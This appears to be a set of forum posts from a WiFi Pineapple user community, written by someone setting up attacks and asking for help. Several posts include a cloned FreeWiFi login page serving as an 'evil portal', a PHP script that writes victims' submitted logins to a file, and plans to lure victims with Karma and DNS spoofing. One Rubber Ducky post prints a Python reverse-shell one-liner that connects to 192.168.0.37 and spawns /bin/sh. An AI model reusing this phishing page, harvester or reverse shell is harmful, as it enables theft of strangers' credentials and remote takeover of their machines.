[EvilPortal + credential harvester]

Hello,

I'm trying to set up evil portal with credential harvester.

so I have duplicated an wifi hotspot identification page, and I use it as my evil portal splash page.

But, in this identification page, I have a "ok" button, wich is redirecting on a post.php page : this page writes the txt file with the credential entered ...

But as I have not reached the $authtarget page, the client stays unconnected, and even the post.php cannot be reached ...

Have you some idea ?

Here is my splash page :

<!DOCTYPE html">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=400, user-scalable = no">
<title></title>
<link rel="stylesheet" type="text/css" href="http://172.16.42.1/freewifi_fichiers/small.css" media="screen">
</head>
<body>
<div id="header">
  <div id="header_c">
    <div id="top">
      <div id="top-menu"><img src="http://172.16.42.1/freewifi_fichiers/logo2.png" alt="Free" height="112" width="232"></div>
    </div>
  </div>
  <div class="clearer"></div>
</div>
<div id="bod">
  <div id="bod_c">
    <div id="block">
      <h1>CONNEXION AU SERVICE <span class="red">FreeWiFi</span></h1>
      <br>
      <div id="block_2">
        <p>Pour vous connecter au service FreeWiFi, <br>
          utilisez les identifiants que vous avez configurés lors de votre premier accès au service<br>
        </p><form id="form1" name="form1" method="post" action="post.php">
          <label for="login" class="label"> IDENTIFIANT</label>
          <input name="login" id="login" class="input_r" required>
          <br>
          <br>
          <br>
          <label for="password" class="label"> MOT DE PASSE</label>
          <input name="password" id="password" class="input_r" value="" type="password" required>
          <br>
          <br>
          <br>
<!--          <a href="#" class="label" style="padding-top:0px;"><img src="/im/help.png" alt="ASSISTANCE" width="37" height="40" border="0"  /></a>
-->
<!--	  <input name="priv" id="priv" type="hidden"  value="" /> -->
          <input name="submit" value="Valider" class="input_b" type="submit">
        </form>
        
     
         <div class="clearer"></div> 
      </div>

      <a href="https://wifi.free.fr/?priv=$PRIV_SUB"><img src="http://172.16.42.1/freewifi_fichiers/abo.jpg" alt="Vous n'êtes pas abonné FREE? Cliquez ici et dans une minute, vous pourrez accéder à internet" border="0" height="70" width="399"></a></div>
  </div>
</div>


</body></html>

Here is mu post.php page :

<?php $file = 'harvester_2014-09-22 20:12:59.594540.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=/etc/nodogsplash/htdocs/$authtarget" />

[question about DNS spoofing and honeypot]

Hi guys,

I have tried but I can't make it work :(

Can someone explain how to use (briefly) PineAP ?

I want the client auto connect to my pineapple, without select it in their wireless preferences (like Karma with previous firmware)

A quick "pineAP use guide" like : one the PineAP tile, clic "enable", and after ..."

Please I need some help :)

[question about DNS spoofing and honeypot]

Something goes wrong ... I can't get karma or PineAP running ...

So on the MV, we have 3 network interfaces :

- LAN

- WLAN0

- WLAN1

I connect my "evil" PC to the pineApple through ethernet.

I connected via Wifi Manager v2.1 radio0 to my regular SSID, which provides internet to the pineapple

I want to use radio1 to "karma" victims ...

May be I'm wrong ?

[question about DNS spoofing and honeypot]

The laptop part was totally unecessary. You could have done it all on the pineapple.

okay thanks shutin :)

[2.0.4 : unable to use Karma ?]

ok thanks Ftb, at the moment I can't figure out how to use PineAP ... but I will search ;)

[2.0.4 : unable to use Karma ?]

Hmmm in the PineAP tile, there is a 'MK5 Karma' button ... I just enabled it ...

I don't understand the PineAP role ...

[2.0.4 : unable to use Karma ?]

Hello guys !

Since I'm with 2.0.4 firmware, I can't use Karma anymore ...

When I click to enable it, it appears as enabled, but on my wireless client (laptops, smarthpones, ...) I can't see the previous known networks ...

Before this firmware, all was working fine ...

[question about DNS spoofing and honeypot]

ok thank you Sebkinne :)

I juste installed evilportal on my MV, and I'm going to play with it :)

So, if I understand, I don't need DNSSpoof anymore ?

[question about DNS spoofing and honeypot]

Hello,

I am trying to do this scenario :

1) With KARMA, i want some clients get auto connected to my pineapple

2) With DNSSpoof, I redirect all the client to my fake wifi authentification page, which is on my Kali Laptop. The fake wifi page logs the credentials entered by the 'victim'.

3) The victim is redirected through internet and can navigate as if it was on the real wifi authentification page (the pineapple is connected to internet with WLAN1 as client)

Is this even possible ?

A little schema attached ;)

thanks,

Carmelo

[DNS Spoof : no refresh of DNS ?]

yes, but what if I can't flush the cash on the client ? (if the computer is in another room where I can't go)

[DNS Spoof : no refresh of DNS ?]

Hello guys,

I'm trying to have fun with DNS Spoof but I have some problems ...

In the DNSSpoof conf, I have this :

172.16.42.1 microsoft.com

I activate DNSSpoof, navigate on microsoft.com with my browser, the pine apple html page appears. It works.

But, if I deactivate DNSSpoof from the PineApple, my browser continues to go into the pine apple page when I want to reach microsoft.com ...

Even with DNSSpoof off !

What can I do ?

Thanks

Carmelo

[Some chars doesn't work (Mac OS)]

Here is the file I use :

https://www.sendspace.com/file/4figxr

[Some chars doesn't work (Mac OS)]

I use frmac.properties file

[Some chars doesn't work (Mac OS)]

Hi guys !

I've just received my Rubber Ducky.

I successfully managed to upgrade the firmware to the Duck 2.1 and change my VID/PID to skip the keyboard setup assistant on a mac.

I've tried to use the osx user backdoor (reverse shell) payload, encode it with duck toolkit online and select "Français MAC" as language (i'm working on an azerty macbook pro). Everything seems to be okay (no azerty/qwerty problem), except one thing : the ~ character does not print.

Somebody does have an idea?

Same problem here with a french mac keyboard.

I have encoded my ducky script with the ressource frmac.properties.

Here is what my ducky writes :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.0.37,8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(q/bin/sh,-iq);'

Here is what I have in my script :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.37",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

[wireshark : sniff http with wireless card]

Is it an open WIFI network?

Nope, it's WPA2 protected, but as it's mine, I'm in !

If you MITM the target, regardless of wireless or wired, you should see all of its traffic and then just use HTTP as the display filter in wireshark to see only http traffic. If its OpenWifi, then put the card sniffing into monitor mode and you should be able to see its traffic if its not encrypted in any way. If in WEP or WPA, then you need to MITM the other node.

What I don't understand : do I have to be connected on the wireless network BEFORE putting the card into monitor mode ? And in wireshark what interface do I have to listen ? wlan0 ? mon0 ?

[wireshark : sniff http with wireless card]

Hello guys and girls :)

So I'm trying to sniff HTTP with wireshark :

- I have an ALFA 500 wireless card, connected to my pentest computer

- the alfa card is connected on my wifi network.

- I want to sniff HTTP that comes from my 2nd computer, which is on the same wireless network.

How can I do this ?

(it's workingvery well if my pentest computer is ethernet connected)

[[Script]FruityCracker Announcement]

ok :) thanks guys :)

[[Script]FruityCracker Announcement]

How can it crack WPA / WPA2 networks ? I think it will need dictionary file ?

[What are you doing with your pineapple ?]

Hello Guys :)

A little topic to ask you what are the usages you're having with your pineapple :)

Me : Little DNS Spoofing with Karma.

You ?

[[HELP] 3G modem stick configuration]

I'm looking also for 3G configuration !

[How to: bootmode/wifijammer]

may be if you put your commands into a bash script, and run the script with dip switch ?

#!/bin/bash

command 1

command 2

and you launch this script with dip switch

[How to delete persistant wlan network ?]

thanks guys :)

I will try this WE :p

[How to delete persistant wlan network ?]

great great great :D

Thanks a lot !

I will google to learn how to deauth the clients !

[How to delete persistant wlan network ?]

Thanks for your answers :)

I'm starting to answer how it works ... But I have some difficulties ...

About Karma : if I understand what it does, it creates an open wireless network. When some device is searching for known networks, Karma says "yes it's me" and the device connects to the pineapple.

But what if there is in the area already a real known network ? Will the device connect to karma or to the real network ?

And if the device is already connected to the a real network, how can I disconnected it to force the connexion to the pineapple ?

[How to delete persistant wlan network ?]

Hello !

I just received my PinneApple :)

So I'm having fun with but ..

In Karme > Karme Configuration > SSID Configuration, I have created a wireless network named "CARTEL", checked the box "persistent.

It works, I can see on my phone the CARTEL network.

But how can I delete it ?

After stopping KARMA and DNS SPOOF, I still can connect to the CARTEL network from my phone ....

Thanks !!